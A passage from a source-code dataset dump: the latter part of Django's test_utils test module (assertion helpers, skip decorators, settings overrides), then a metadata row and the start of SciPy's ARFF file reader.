except Exception as e:
self.fail("No %s exception should have been raised for %s." % (
e.__class__.__name__, func.__name__))
def test_skip_unless_db_feature(self):
"""
Testing the django.test.skipUnlessDBFeature decorator.
"""
# Total hack, but it works, just want an attribute that's always true.
@skipUnlessDBFeature("__class__")
def test_func():
raise ValueError
@skipUnlessDBFeature("notprovided")
def test_func2():
raise ValueError
@skipUnlessDBFeature("__class__", "__class__")
def test_func3():
raise ValueError
@skipUnlessDBFeature("__class__", "notprovided")
def test_func4():
raise ValueError
self._assert_skipping(test_func, ValueError)
self._assert_skipping(test_func2, unittest.SkipTest)
self._assert_skipping(test_func3, ValueError)
self._assert_skipping(test_func4, unittest.SkipTest)
def test_skip_if_db_feature(self):
"""
Testing the django.test.skipIfDBFeature decorator.
"""
@skipIfDBFeature("__class__")
def test_func():
raise ValueError
@skipIfDBFeature("notprovided")
def test_func2():
raise ValueError
@skipIfDBFeature("__class__", "__class__")
def test_func3():
raise ValueError
@skipIfDBFeature("__class__", "notprovided")
def test_func4():
raise ValueError
@skipIfDBFeature("notprovided", "notprovided")
def test_func5():
raise ValueError
self._assert_skipping(test_func, unittest.SkipTest)
self._assert_skipping(test_func2, ValueError)
self._assert_skipping(test_func3, unittest.SkipTest)
self._assert_skipping(test_func4, unittest.SkipTest)
self._assert_skipping(test_func5, ValueError)
class SkippingClassTestCase(SimpleTestCase):
def test_skip_class_unless_db_feature(self):
@skipUnlessDBFeature("__class__")
class NotSkippedTests(unittest.TestCase):
def test_dummy(self):
return
@skipIfDBFeature("__class__")
class SkippedTests(unittest.TestCase):
def test_will_be_skipped(self):
self.fail("We should never arrive here.")
test_suite = unittest.TestSuite()
test_suite.addTest(NotSkippedTests('test_dummy'))
try:
test_suite.addTest(SkippedTests('test_will_be_skipped'))
except unittest.SkipTest:
self.fail("SkipTest should not be raised at this stage")
result = unittest.TextTestRunner(stream=six.StringIO()).run(test_suite)
self.assertEqual(result.testsRun, 2)
self.assertEqual(len(result.skipped), 1)
@override_settings(ROOT_URLCONF='test_utils.urls')
class AssertNumQueriesTests(TestCase):
def test_assert_num_queries(self):
def test_func():
raise ValueError
self.assertRaises(ValueError, self.assertNumQueries, 2, test_func)
def test_assert_num_queries_with_client(self):
person = Person.objects.create(name='test')
self.assertNumQueries(
1,
self.client.get,
"/test_utils/get_person/%s/" % person.pk
)
self.assertNumQueries(
1,
self.client.get,
"/test_utils/get_person/%s/" % person.pk
)
def test_func():
self.client.get("/test_utils/get_person/%s/" % person.pk)
self.client.get("/test_utils/get_person/%s/" % person.pk)
self.assertNumQueries(2, test_func)
class AssertQuerysetEqualTests(TestCase):
def setUp(self):
self.p1 = Person.objects.create(name='p1')
self.p2 = Person.objects.create(name='p2')
def test_ordered(self):
self.assertQuerysetEqual(
Person.objects.all().order_by('name'),
[repr(self.p1), repr(self.p2)]
)
def test_unordered(self):
self.assertQuerysetEqual(
Person.objects.all().order_by('name'),
[repr(self.p2), repr(self.p1)],
ordered=False
)
def test_transform(self):
self.assertQuerysetEqual(
Person.objects.all().order_by('name'),
[self.p1.pk, self.p2.pk],
transform=lambda x: x.pk
)
def test_undefined_order(self):
# Using an unordered queryset with more than one ordered value
# is an error.
with self.assertRaises(ValueError):
self.assertQuerysetEqual(
Person.objects.all(),
[repr(self.p1), repr(self.p2)]
)
# No error for one value.
self.assertQuerysetEqual(
Person.objects.filter(name='p1'),
[repr(self.p1)]
)
def test_repeated_values(self):
"""
Test that assertQuerysetEqual checks the number of appearance of each item
when used with option ordered=False.
"""
batmobile = Car.objects.create(name='Batmobile')
k2000 = Car.objects.create(name='K 2000')
PossessedCar.objects.bulk_create([
PossessedCar(car=batmobile, belongs_to=self.p1),
PossessedCar(car=batmobile, belongs_to=self.p1),
PossessedCar(car=k2000, belongs_to=self.p1),
PossessedCar(car=k2000, belongs_to=self.p1),
PossessedCar(car=k2000, belongs_to=self.p1),
PossessedCar(car=k2000, belongs_to=self.p1),
])
with self.assertRaises(AssertionError):
self.assertQuerysetEqual(
self.p1.cars.all(),
[repr(batmobile), repr(k2000)],
ordered=False
)
self.assertQuerysetEqual(
self.p1.cars.all(),
[repr(batmobile)] * 2 + [repr(k2000)] * 4,
ordered=False
)
@override_settings(ROOT_URLCONF='test_utils.urls')
class CaptureQueriesContextManagerTests(TestCase):
def setUp(self):
self.person_pk = six.text_type(Person.objects.create(name='test').pk)
def test_simple(self):
with CaptureQueriesContext(connection) as captured_queries:
Person.objects.get(pk=self.person_pk)
self.assertEqual(len(captured_queries), 1)
self.assertIn(self.person_pk, captured_queries[0]['sql'])
with CaptureQueriesContext(connection) as captured_queries:
pass
self.assertEqual(0, len(captured_queries))
def test_within(self):
with CaptureQueriesContext(connection) as captured_queries:
Person.objects.get(pk=self.person_pk)
self.assertEqual(len(captured_queries), 1)
self.assertIn(self.person_pk, captured_queries[0]['sql'])
def test_nested(self):
with CaptureQueriesContext(connection) as captured_queries:
Person.objects.count()
with CaptureQueriesContext(connection) as nested_captured_queries:
Person.objects.count()
self.assertEqual(1, len(nested_captured_queries))
self.assertEqual(2, len(captured_queries))
def test_failure(self):
with self.assertRaises(TypeError):
with CaptureQueriesContext(connection):
raise TypeError
def test_with_client(self):
with CaptureQueriesContext(connection) as captured_queries:
self.client.get("/test_utils/get_person/%s/" % self.person_pk)
self.assertEqual(len(captured_queries), 1)
self.assertIn(self.person_pk, captured_queries[0]['sql'])
with CaptureQueriesContext(connection) as captured_queries:
self.client.get("/test_utils/get_person/%s/" % self.person_pk)
self.assertEqual(len(captured_queries), 1)
self.assertIn(self.person_pk, captured_queries[0]['sql'])
with CaptureQueriesContext(connection) as captured_queries:
self.client.get("/test_utils/get_person/%s/" % self.person_pk)
self.client.get("/test_utils/get_person/%s/" % self.person_pk)
self.assertEqual(len(captured_queries), 2)
self.assertIn(self.person_pk, captured_queries[0]['sql'])
self.assertIn(self.person_pk, captured_queries[1]['sql'])
@override_settings(ROOT_URLCONF='test_utils.urls')
class AssertNumQueriesContextManagerTests(TestCase):
def test_simple(self):
with self.assertNumQueries(0):
pass
with self.assertNumQueries(1):
Person.objects.count()
with self.assertNumQueries(2):
Person.objects.count()
Person.objects.count()
def test_failure(self):
with self.assertRaises(AssertionError) as exc_info:
with self.assertNumQueries(2):
Person.objects.count()
self.assertIn("1 queries executed, 2 expected", str(exc_info.exception))
self.assertIn("Captured queries were", str(exc_info.exception))
with self.assertRaises(TypeError):
with self.assertNumQueries(4000):
raise TypeError
def test_with_client(self):
person = Person.objects.create(name="test")
with self.assertNumQueries(1):
self.client.get("/test_utils/get_person/%s/" % person.pk)
with self.assertNumQueries(1):
self.client.get("/test_utils/get_person/%s/" % person.pk)
with self.assertNumQueries(2):
self.client.get("/test_utils/get_person/%s/" % person.pk)
self.client.get("/test_utils/get_person/%s/" % person.pk)
@override_settings(ROOT_URLCONF='test_utils.urls')
class AssertTemplateUsedContextManagerTests(SimpleTestCase):
def test_usage(self):
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/base.html')
with self.assertTemplateUsed(template_name='template_used/base.html'):
render_to_string('template_used/base.html')
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/include.html')
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/extends.html')
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/base.html')
render_to_string('template_used/base.html')
def test_nested_usage(self):
with self.assertTemplateUsed('template_used/base.html'):
with self.assertTemplateUsed('template_used/include.html'):
render_to_string('template_used/include.html')
with self.assertTemplateUsed('template_used/extends.html'):
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/extends.html')
with self.assertTemplateUsed('template_used/base.html'):
with self.assertTemplateUsed('template_used/alternative.html'):
render_to_string('template_used/alternative.html')
render_to_string('template_used/base.html')
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/extends.html')
with self.assertTemplateNotUsed('template_used/base.html'):
render_to_string('template_used/alternative.html')
render_to_string('template_used/base.html')
def test_not_used(self):
with self.assertTemplateNotUsed('template_used/base.html'):
pass
with self.assertTemplateNotUsed('template_used/alternative.html'):
pass
def test_error_message(self):
with six.assertRaisesRegex(self, AssertionError, r'^template_used/base\.html'):
with self.assertTemplateUsed('template_used/base.html'):
pass
with six.assertRaisesRegex(self, AssertionError, r'^template_used/base\.html'):
with self.assertTemplateUsed(template_name='template_used/base.html'):
pass
with six.assertRaisesRegex(self, AssertionError, r'^template_used/base\.html.*template_used/alternative\.html$'):
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/alternative.html')
with self.assertRaises(AssertionError) as cm:
response = self.client.get('/test_utils/no_template_used/')
self.assertTemplateUsed(response, 'template_used/base.html')
self.assertEqual(cm.exception.args[0], "No templates used to render the response")
def test_failure(self):
with self.assertRaises(TypeError):
with self.assertTemplateUsed():
pass
with self.assertRaises(AssertionError):
with self.assertTemplateUsed(''):
pass
with self.assertRaises(AssertionError):
with self.assertTemplateUsed(''):
render_to_string('template_used/base.html')
with self.assertRaises(AssertionError):
with self.assertTemplateUsed(template_name=''):
pass
with self.assertRaises(AssertionError):
with self.assertTemplateUsed('template_used/base.html'):
render_to_string('template_used/alternative.html')
def test_assert_used_on_http_response(self):
response = HttpResponse()
error_msg = (
'assertTemplateUsed() and assertTemplateNotUsed() are only '
'usable on responses fetched using the Django test Client.'
)
with self.assertRaisesMessage(ValueError, error_msg):
self.assertTemplateUsed(response, 'template.html')
with self.assertRaisesMessage(ValueError, error_msg):
self.assertTemplateNotUsed(response, 'template.html')
class HTMLEqualTests(SimpleTestCase):
def test_html_parser(self):
element = parse_html('<div><p>Hello</p></div>')
self.assertEqual(len(element.children), 1)
self.assertEqual(element.children[0].name, 'p')
self.assertEqual(element.children[0].children[0], 'Hello')
parse_html('<p>')
parse_html('<p attr>')
dom = parse_html('<p>foo')
self.assertEqual(len(dom.children), 1)
self.assertEqual(dom.name, 'p')
self.assertEqual(dom[0], 'foo')
def test_parse_html_in_script(self):
parse_html('<script>var a = "<p" + ">";</script>')
parse_html('''
<script>
var js_sha_link='<p>***</p>';
</script>
''')
# script content will be parsed to text
dom = parse_html('''
<script><p>foo</p> '</scr'+'ipt>' <span>bar</span></script>
''')
self.assertEqual(len(dom.children), 1)
self.assertEqual(dom.children[0], "<p>foo</p> '</scr'+'ipt>' <span>bar</span>")
def test_self_closing_tags(self):
self_closing_tags = ('br', 'hr', 'input', 'img', 'meta', 'spacer',
'link', 'frame', 'base', 'col')
for tag in self_closing_tags:
dom = parse_html('<p>Hello <%s> world</p>' % tag)
self.assertEqual(len(dom.children), 3)
self.assertEqual(dom[0], 'Hello')
self.assertEqual(dom[1].name, tag)
self.assertEqual(dom[2], 'world')
dom = parse_html('<p>Hello <%s /> world</p>' % tag)
self.assertEqual(len(dom.children), 3)
self.assertEqual(dom[0], 'Hello')
self.assertEqual(dom[1].name, tag)
self.assertEqual(dom[2], 'world')
def test_simple_equal_html(self):
self.assertHTMLEqual('', '')
self.assertHTMLEqual('<p></p>', '<p></p>')
self.assertHTMLEqual('<p></p>', ' <p> </p> ')
self.assertHTMLEqual(
'<div><p>Hello</p></div>',
'<div><p>Hello</p></div>')
self.assertHTMLEqual(
'<div><p>Hello</p></div>',
'<div> <p>Hello</p> </div>')
self.assertHTMLEqual(
'<div>\n<p>Hello</p></div>',
'<div><p>Hello</p></div>\n')
self.assertHTMLEqual(
'<div><p>Hello\nWorld !</p></div>',
'<div><p>Hello World\n!</p></div>')
self.assertHTMLEqual(
'<div><p>Hello\nWorld !</p></div>',
'<div><p>Hello World\n!</p></div>')
self.assertHTMLEqual(
'<p>Hello World !</p>',
'<p>Hello World\n\n!</p>')
self.assertHTMLEqual('<p> </p>', '<p></p>')
self.assertHTMLEqual('<p/>', '<p></p>')
self.assertHTMLEqual('<p />', '<p></p>')
self.assertHTMLEqual('<input checked>', '<input checked="checked">')
self.assertHTMLEqual('<p>Hello', '<p> Hello')
self.assertHTMLEqual('<p>Hello</p>World', '<p>Hello</p> World')
def test_ignore_comments(self):
self.assertHTMLEqual(
'<div>Hello<!-- this is a comment --> World!</div>',
'<div>Hello World!</div>')
def test_unequal_html(self):
self.assertHTMLNotEqual('<p>Hello</p>', '<p>Hello!</p>')
self.assertHTMLNotEqual('<p>foobar</p>', '<p>foo bar</p>')
self.assertHTMLNotEqual('<p>foo bar</p>', '<p>foo bar</p>')
self.assertHTMLNotEqual('<p>foo nbsp</p>', '<p>foo </p>')
self.assertHTMLNotEqual('<p>foo #20</p>', '<p>foo </p>')
self.assertHTMLNotEqual(
'<p><span>Hello</span><span>World</span></p>',
'<p><span>Hello</span>World</p>')
self.assertHTMLNotEqual(
'<p><span>Hello</span>World</p>',
'<p><span>Hello</span><span>World</span></p>')
def test_attributes(self):
self.assertHTMLEqual(
'<input type="text" id="id_name" />',
'<input id="id_name" type="text" />')
self.assertHTMLEqual(
'''<input type='text' id="id_name" />''',
'<input id="id_name" type="text" />')
self.assertHTMLNotEqual(
'<input type="text" id="id_name" />',
'<input type="password" id="id_name" />')
def test_complex_examples(self):
self.assertHTMLEqual(
"""<tr><th><label for="id_first_name">First name:</label></th>
<td><input type="text" name="first_name" value="John" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th>
<td><input type="text" id="id_last_name" name="last_name" value="Lennon" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th>
<td><input type="text" value="1940-10-9" name="birthday" id="id_birthday" /></td></tr>""",
"""
<tr><th>
<label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" value="John" id="id_first_name" />
</td></tr>
<tr><th>
<label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" value="Lennon" id="id_last_name" />
</td></tr>
<tr><th>
<label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" value="1940-10-9" id="id_birthday" />
</td></tr>
""")
self.assertHTMLEqual(
"""<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet">
<title>Document</title>
<meta attribute="value">
</head>
<body>
<p>
This is a valid paragraph
<div> this is a div AFTER the p</div>
</body>
</html>""", """
<html>
<head>
<link rel="stylesheet">
<title>Document</title>
<meta attribute="value">
</head>
<body>
<p> This is a valid paragraph
<!-- browsers would close the p tag here -->
<div> this is a div AFTER the p</div>
</p> <!-- this is invalid HTML parsing, but it should make no
difference in most cases -->
</body>
</html>""")
def test_html_contain(self):
# equal html contains each other
dom1 = parse_html('<p>foo')
dom2 = parse_html('<p>foo</p>')
self.assertIn(dom1, dom2)
self.assertIn(dom2, dom1)
dom2 = parse_html('<div><p>foo</p></div>')
self.assertIn(dom1, dom2)
self.assertNotIn(dom2, dom1)
self.assertNotIn('<p>foo</p>', dom2)
self.assertIn('foo', dom2)
# when a root element is used ...
dom1 = parse_html('<p>foo</p><p>bar</p>')
dom2 = parse_html('<p>foo</p><p>bar</p>')
self.assertIn(dom1, dom2)
dom1 = parse_html('<p>foo</p>')
self.assertIn(dom1, dom2)
dom1 = parse_html('<p>bar</p>')
self.assertIn(dom1, dom2)
def test_count(self):
# equal html contains each other one time
dom1 = parse_html('<p>foo')
dom2 = parse_html('<p>foo</p>')
self.assertEqual(dom1.count(dom2), 1)
self.assertEqual(dom2.count(dom1), 1)
dom2 = parse_html('<p>foo</p><p>bar</p>')
self.assertEqual(dom2.count(dom1), 1)
dom2 = parse_html('<p>foo foo</p><p>foo</p>')
self.assertEqual(dom2.count('foo'), 3)
dom2 = parse_html('<p class="bar">foo</p>')
self.assertEqual(dom2.count('bar'), 0)
self.assertEqual(dom2.count('class'), 0)
self.assertEqual(dom2.count('p'), 0)
self.assertEqual(dom2.count('o'), 2)
dom2 = parse_html('<p>foo</p><p>foo</p>')
self.assertEqual(dom2.count(dom1), 2)
dom2 = parse_html('<div><p>foo<input type=""></p><p>foo</p></div>')
self.assertEqual(dom2.count(dom1), 1)
dom2 = parse_html('<div><div><p>foo</p></div></div>')
self.assertEqual(dom2.count(dom1), 1)
dom2 = parse_html('<p>foo<p>foo</p></p>')
self.assertEqual(dom2.count(dom1), 1)
dom2 = parse_html('<p>foo<p>bar</p></p>')
self.assertEqual(dom2.count(dom1), 0)
def test_parsing_errors(self):
with self.assertRaises(AssertionError):
self.assertHTMLEqual('<p>', '')
with self.assertRaises(AssertionError):
self.assertHTMLEqual('', '<p>')
with self.assertRaises(HTMLParseError):
parse_html('</p>')
def test_contains_html(self):
response = HttpResponse('''<body>
This is a form: <form action="" method="get">
<input type="text" name="Hello" />
</form></body>''')
self.assertNotContains(response, "<input name='Hello' type='text'>")
self.assertContains(response, '<form action="" method="get">')
self.assertContains(response, "<input name='Hello' type='text'>", html=True)
self.assertNotContains(response, '<form action="" method="get">', html=True)
invalid_response = HttpResponse('''<body <bad>>''')
with self.assertRaises(AssertionError):
self.assertContains(invalid_response, '<p></p>')
with self.assertRaises(AssertionError):
self.assertContains(response, '<p "whats" that>')
def test_unicode_handling(self):
response = HttpResponse('<p class="help">Some help text for the title (with unicode ŠĐĆŽćžšđ)</p>')
self.assertContains(response, '<p class="help">Some help text for the title (with unicode ŠĐĆŽćžšđ)</p>', html=True)
class JSONEqualTests(SimpleTestCase):
def test_simple_equal(self):
json1 = '{"attr1": "foo", "attr2":"baz"}'
json2 = '{"attr1": "foo", "attr2":"baz"}'
self.assertJSONEqual(json1, json2)
def test_simple_equal_unordered(self):
json1 = '{"attr1": "foo", "attr2":"baz"}'
json2 = '{"attr2":"baz", "attr1": "foo"}'
self.assertJSONEqual(json1, json2)
def test_simple_equal_raise(self):
json1 = '{"attr1": "foo", "attr2":"baz"}'
json2 = '{"attr2":"baz"}'
with self.assertRaises(AssertionError):
self.assertJSONEqual(json1, json2)
def test_equal_parsing_errors(self):
invalid_json = '{"attr1": "foo, "attr2":"baz"}'
valid_json = '{"attr1": "foo", "attr2":"baz"}'
with self.assertRaises(AssertionError):
self.assertJSONEqual(invalid_json, valid_json)
with self.assertRaises(AssertionError):
self.assertJSONEqual(valid_json, invalid_json)
def test_simple_not_equal(self):
json1 = '{"attr1": "foo", "attr2":"baz"}'
json2 = '{"attr2":"baz"}'
self.assertJSONNotEqual(json1, json2)
def test_simple_not_equal_raise(self):
json1 = '{"attr1": "foo", "attr2":"baz"}'
json2 = '{"attr1": "foo", "attr2":"baz"}'
with self.assertRaises(AssertionError):
self.assertJSONNotEqual(json1, json2)
def test_not_equal_parsing_errors(self):
invalid_json = '{"attr1": "foo, "attr2":"baz"}'
valid_json = '{"attr1": "foo", "attr2":"baz"}'
with self.assertRaises(AssertionError):
self.assertJSONNotEqual(invalid_json, valid_json)
with self.assertRaises(AssertionError):
self.assertJSONNotEqual(valid_json, invalid_json)
class XMLEqualTests(SimpleTestCase):
def test_simple_equal(self):
xml1 = "<elem attr1='a' attr2='b' />"
xml2 = "<elem attr1='a' attr2='b' />"
self.assertXMLEqual(xml1, xml2)
def test_simple_equal_unordered(self):
xml1 = "<elem attr1='a' attr2='b' />"
xml2 = "<elem attr2='b' attr1='a' />"
self.assertXMLEqual(xml1, xml2)
def test_simple_equal_raise(self):
xml1 = "<elem attr1='a' />"
xml2 = "<elem attr2='b' attr1='a' />"
with self.assertRaises(AssertionError):
self.assertXMLEqual(xml1, xml2)
def test_simple_equal_raises_message(self):
xml1 = "<elem attr1='a' />"
xml2 = "<elem attr2='b' attr1='a' />"
msg = '''{xml1} != {xml2}
- <elem attr1='a' />
+ <elem attr2='b' attr1='a' />
? ++++++++++
'''.format(xml1=repr(xml1), xml2=repr(xml2))
with self.assertRaisesMessage(AssertionError, msg):
self.assertXMLEqual(xml1, xml2)
def test_simple_not_equal(self):
xml1 = "<elem attr1='a' attr2='c' />"
xml2 = "<elem attr1='a' attr2='b' />"
self.assertXMLNotEqual(xml1, xml2)
def test_simple_not_equal_raise(self):
xml1 = "<elem attr1='a' attr2='b' />"
xml2 = "<elem attr2='b' attr1='a' />"
with self.assertRaises(AssertionError):
self.assertXMLNotEqual(xml1, xml2)
def test_parsing_errors(self):
xml_unvalid = "<elem attr1='a attr2='b' />"
xml2 = "<elem attr2='b' attr1='a' />"
with self.assertRaises(AssertionError):
self.assertXMLNotEqual(xml_unvalid, xml2)
def test_comment_root(self):
xml1 = "<?xml version='1.0'?><!-- comment1 --><elem attr1='a' attr2='b' />"
xml2 = "<?xml version='1.0'?><!-- comment2 --><elem attr2='b' attr1='a' />"
self.assertXMLEqual(xml1, xml2)
class SkippingExtraTests(TestCase):
fixtures = ['should_not_be_loaded.json']
# HACK: This depends on internals of our TestCase subclasses
def __call__(self, result=None):
# Detect fixture loading by counting SQL queries, should be zero
with self.assertNumQueries(0):
super(SkippingExtraTests, self).__call__(result)
@unittest.skip("Fixture loading should not be performed for skipped tests.")
def test_fixtures_are_skipped(self):
pass
class AssertRaisesMsgTest(SimpleTestCase):
def test_assert_raises_message(self):
msg = "'Expected message' not found in 'Unexpected message'"
# context manager form of assertRaisesMessage()
with self.assertRaisesMessage(AssertionError, msg):
with self.assertRaisesMessage(ValueError, "Expected message"):
raise ValueError("Unexpected message")
# callable form
def func():
raise ValueError("Unexpected message")
with self.assertRaisesMessage(AssertionError, msg):
self.assertRaisesMessage(ValueError, "Expected message", func)
def test_special_re_chars(self):
"""assertRaisesMessage shouldn't interpret RE special chars."""
def func1():
raise ValueError("[.*x+]y?")
self.assertRaisesMessage(ValueError, "[.*x+]y?", func1)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_callable_obj_param(self):
# callable_obj was a documented kwarg in Django 1.8 and older.
def func1():
raise ValueError("[.*x+]y?")
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertRaisesMessage(ValueError, "[.*x+]y?", callable_obj=func1)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns[0].message),
'The callable_obj kwarg is deprecated. Pass the callable '
'as a positional argument instead.'
)
class AssertFieldOutputTests(SimpleTestCase):
def test_assert_field_output(self):
error_invalid = ['Enter a valid email address.']
self.assertFieldOutput(EmailField, {'a@a.com': 'a@a.com'}, {'aaa': error_invalid})
self.assertRaises(AssertionError, self.assertFieldOutput, EmailField, {'a@a.com': 'a@a.com'}, {'aaa': error_invalid + ['Another error']})
self.assertRaises(AssertionError, self.assertFieldOutput, EmailField, {'a@a.com': 'Wrong output'}, {'aaa': error_invalid})
self.assertRaises(AssertionError, self.assertFieldOutput, EmailField, {'a@a.com': 'a@a.com'}, {'aaa': ['Come on, gimme some well formatted data, dude.']})
def test_custom_required_message(self):
class MyCustomField(IntegerField):
default_error_messages = {
'required': 'This is really required.',
}
self.assertFieldOutput(MyCustomField, {}, {}, empty_value=None)
class FirstUrls:
urlpatterns = [url(r'first/$', empty_response, name='first')]
class SecondUrls:
urlpatterns = [url(r'second/$', empty_response, name='second')]
class OverrideSettingsTests(SimpleTestCase):
# #21518 -- If neither override_settings nor a setting_changed receiver
# clears the URL cache between tests, then one of test_first or
# test_second will fail.
@override_settings(ROOT_URLCONF=FirstUrls)
def test_urlconf_first(self):
reverse('first')
@override_settings(ROOT_URLCONF=SecondUrls)
def test_urlconf_second(self):
reverse('second')
def test_urlconf_cache(self):
self.assertRaises(NoReverseMatch, lambda: reverse('first'))
self.assertRaises(NoReverseMatch, lambda: reverse('second'))
with override_settings(ROOT_URLCONF=FirstUrls):
self.client.get(reverse('first'))
self.assertRaises(NoReverseMatch, lambda: reverse('second'))
with override_settings(ROOT_URLCONF=SecondUrls):
self.assertRaises(NoReverseMatch, lambda: reverse('first'))
self.client.get(reverse('second'))
self.client.get(reverse('first'))
self.assertRaises(NoReverseMatch, lambda: reverse('second'))
self.assertRaises(NoReverseMatch, lambda: reverse('first'))
self.assertRaises(NoReverseMatch, lambda: reverse('second'))
def test_override_media_root(self):
"""
Overriding the MEDIA_ROOT setting should be reflected in the
base_location attribute of django.core.files.storage.default_storage.
"""
self.assertEqual(default_storage.base_location, '')
with self.settings(MEDIA_ROOT='test_value'):
self.assertEqual(default_storage.base_location, 'test_value')
def test_override_media_url(self):
"""
Overriding the MEDIA_URL setting should be reflected in the
base_url attribute of django.core.files.storage.default_storage.
"""
self.assertEqual(default_storage.base_location, '')
with self.settings(MEDIA_URL='/test_value/'):
self.assertEqual(default_storage.base_url, '/test_value/')
def test_override_file_upload_permissions(self):
"""
Overriding the FILE_UPLOAD_PERMISSIONS setting should be reflected in
the file_permissions_mode attribute of
django.core.files.storage.default_storage.
"""
self.assertIsNone(default_storage.file_permissions_mode)
with self.settings(FILE_UPLOAD_PERMISSIONS=0o777):
self.assertEqual(default_storage.file_permissions_mode, 0o777)
def test_override_file_upload_directory_permissions(self):
"""
Overriding the FILE_UPLOAD_DIRECTORY_PERMISSIONS setting should be
reflected in the directory_permissions_mode attribute of
django.core.files.storage.default_storage.
"""
self.assertIsNone(default_storage.directory_permissions_mode)
with self.settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777):
self.assertEqual(default_storage.directory_permissions_mode, 0o777)
def test_override_database_routers(self):
"""
Overriding DATABASE_ROUTERS should update the master router.
"""
test_routers = (object(),)
with self.settings(DATABASE_ROUTERS=test_routers):
self.assertSequenceEqual(router.routers, test_routers)
def test_override_static_url(self):
"""
Overriding the STATIC_URL setting should be reflected in the
base_url attribute of
django.contrib.staticfiles.storage.staticfiles_storage.
"""
with self.settings(STATIC_URL='/test/'):
self.assertEqual(staticfiles_storage.base_url, '/test/')
def test_override_static_root(self):
"""
Overriding the STATIC_ROOT setting should be reflected in the
location attribute of
django.contrib.staticfiles.storage.staticfiles_storage.
"""
with self.settings(STATIC_ROOT='/tmp/test'):
self.assertEqual(staticfiles_storage.location, abspathu('/tmp/test'))
def test_override_staticfiles_storage(self):
"""
Overriding the STATICFILES_STORAGE setting should be reflected in
the value of django.contrib.staticfiles.storage.staticfiles_storage.
"""
new_class = 'CachedStaticFilesStorage'
new_storage = 'django.contrib.staticfiles.storage.' + new_class
with self.settings(STATICFILES_STORAGE=new_storage):
self.assertEqual(staticfiles_storage.__class__.__name__, new_class)
def test_override_staticfiles_finders(self):
"""
Overriding the STATICFILES_FINDERS setting should be reflected in
the return value of django.contrib.staticfiles.finders.get_finders.
"""
current = get_finders()
self.assertGreater(len(list(current)), 1)
finders = ['django.contrib.staticfiles.finders.FileSystemFinder']
with self.settings(STATICFILES_FINDERS=finders):
self.assertEqual(len(list(get_finders())), len(finders))
def test_override_staticfiles_dirs(self):
"""
Overriding the STATICFILES_DIRS setting should be reflected in
the locations attribute of the
django.contrib.staticfiles.finders.FileSystemFinder instance.
"""
finder = get_finder('django.contrib.staticfiles.finders.FileSystemFinder')
test_path = '/tmp/test'
expected_location = ('', test_path)
self.assertNotIn(expected_location, finder.locations)
with self.settings(STATICFILES_DIRS=[test_path]):
finder = get_finder('django.contrib.staticfiles.finders.FileSystemFinder')
self.assertIn(expected_location, finder.locations)
class TestBadSetUpTestData(TestCase):
"""
An exception in setUpTestData() shouldn't leak a transaction which would
cascade across the rest of the test suite.
"""
class MyException(Exception):
pass
@classmethod
def setUpClass(cls):
try:
super(TestBadSetUpTestData, cls).setUpClass()
except cls.MyException:
cls._in_atomic_block = connection.in_atomic_block
@classmethod
def tearDownClass(Cls):
# override to avoid a second cls._rollback_atomics() which would fail.
# Normal setUpClass() methods won't have exception handling so this
# method wouldn't typically be run.
pass
@classmethod
def setUpTestData(cls):
# Simulate a broken setUpTestData() method.
raise cls.MyException()
def test_failure_in_setUpTestData_should_rollback_transaction(self):
# setUpTestData() should call _rollback_atomics() so that the
# transaction doesn't leak.
self.assertFalse(self._in_atomic_block)
class DisallowedDatabaseQueriesTests(SimpleTestCase):
def test_disallowed_database_queries(self):
expected_message = (
"Database queries aren't allowed in SimpleTestCase. "
"Either use TestCase or TransactionTestCase to ensure proper test isolation or "
"set DisallowedDatabaseQueriesTests.allow_database_queries to True to silence this failure."
)
with self.assertRaisesMessage(AssertionError, expected_message):
Car.objects.first()
class AllowedDatabaseQueriesTests(SimpleTestCase):
allow_database_queries = True
def test_allowed_database_queries(self):
Car.objects.first()
| bsd-3-clause |
jlcarmic/producthunt_simulator | venv/lib/python2.7/site-packages/scipy/io/arff/arffread.py | 11 | 20186 | #! /usr/bin/env python
# Last Change: Mon Aug 20 08:00 PM 2007 J
from __future__ import division, print_function, absolute_import
import re
import itertools
import datetime
from functools import partial
import numpy as np
from scipy._lib.six import next
"""A module to read arff files."""
__all__ = ['MetaData', 'loadarff', 'ArffError', 'ParseArffError']
# An Arff file is basically two parts:
# - header
# - data
#
# A header has each of its components starting by @META where META is one of
# the keyword (attribute of relation, for now).
# TODO:
# - both integer and reals are treated as numeric -> the integer info
# is lost!
# - Replace ValueError by ParseError or something
# We know can handle the following:
# - numeric and nominal attributes
# - missing values for numeric attributes
r_meta = re.compile('^\s*@')
# Match a comment
r_comment = re.compile(r'^%')
# Match an empty line
r_empty = re.compile(r'^\s+$')
# Match a header line, that is a line which starts by @ + a word
r_headerline = re.compile(r'^@\S*')
r_datameta = re.compile(r'^@[Dd][Aa][Tt][Aa]')
r_relation = re.compile(r'^@[Rr][Ee][Ll][Aa][Tt][Ii][Oo][Nn]\s*(\S*)')
r_attribute = re.compile(r'^@[Aa][Tt][Tt][Rr][Ii][Bb][Uu][Tt][Ee]\s*(..*$)')
# To get attributes name enclosed with ''
r_comattrval = re.compile(r"'(..+)'\s+(..+$)")
# To get attributes name enclosed with '', possibly spread across multilines
r_mcomattrval = re.compile(r"'([..\n]+)'\s+(..+$)")
# To get normal attributes
r_wcomattrval = re.compile(r"(\S+)\s+(..+$)")
#-------------------------
# Module defined exception
#-------------------------
class ArffError(IOError):
pass
class ParseArffError(ArffError):
pass
#------------------
# Various utilities
#------------------
# An attribute is defined as @attribute name value
def parse_type(attrtype):
"""Given an arff attribute value (meta data), returns its type.
Expect the value to be a name."""
